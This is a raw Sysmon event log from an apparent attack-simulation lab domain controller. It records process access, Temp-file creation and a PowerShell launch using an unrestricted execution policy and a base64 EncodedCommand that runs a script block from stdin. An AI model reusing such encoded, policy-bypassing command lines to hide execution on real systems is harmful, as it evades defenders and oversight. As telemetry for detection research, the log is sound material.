ABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000383Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.884{5D479F2C-167A-5F84-0A03-000000007E01}1832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\adoupm4p.cmdline2020-10-12 08:40:26.884 11241100x8000000000000000382Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.localDLL2020-10-12 08:40:26.884{5D479F2C-167A-5F84-0A03-000000007E01}1832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\adoupm4p.dll2020-10-12 08:40:26.884 10341000x8000000000000000381Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.446{5D479F2C-167A-5F84-0703-000000007E01}50444736C:\Windows\system32\conhost.exe{5D479F2C-167A-5F84-0B03-000000007E01}4604C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000380Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.446{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000379Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.446{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000378Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.446{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000377Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.446{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000376Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.446{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000375Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.446{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000374Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.446{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000373Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.446{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000372Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.446{5D479F2C-14FE-5F84-0500-000000007E01}6402464C:\Windows\system32\csrss.exe{5D479F2C-167A-5F84-0B03-000000007E01}4604C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000371Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.446{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000370Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.446{5D479F2C-167A-5F84-0A03-000000007E01}18322316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-167A-5F84-0B03-000000007E01}4604C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+3698331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e241a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e23e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+368d54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35de4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e42edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e26540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e26540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e263d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e18356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e24889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e2447c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e241a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e23e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+368d54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e0acd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e0a2a7(wow64) 154100x8000000000000000369Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.446{5D479F2C-167A-5F84-0B03-000000007E01}4604C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-167A-5F84-77B4-110000000000}0x11b4770HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{5D479F2C-167A-5F84-0A03-000000007E01}1832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000368Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.430{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000367Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.430{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000366Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.430{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000365Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.384{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-167A-5F84-0A03-000000007E01}1832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000364Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.384{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-167A-5F84-0A03-000000007E01}1832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000363Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.352{5D479F2C-167A-5F84-0A03-000000007E01}1832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_cki3jqjz.nhs.ps12020-10-12 08:40:26.352 10341000x8000000000000000362Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.337{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-167A-5F84-0A03-000000007E01}1832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000361Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.305{5D479F2C-167A-5F84-0703-000000007E01}50444736C:\Windows\system32\conhost.exe{5D479F2C-167A-5F84-0A03-000000007E01}1832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000360Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.305{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 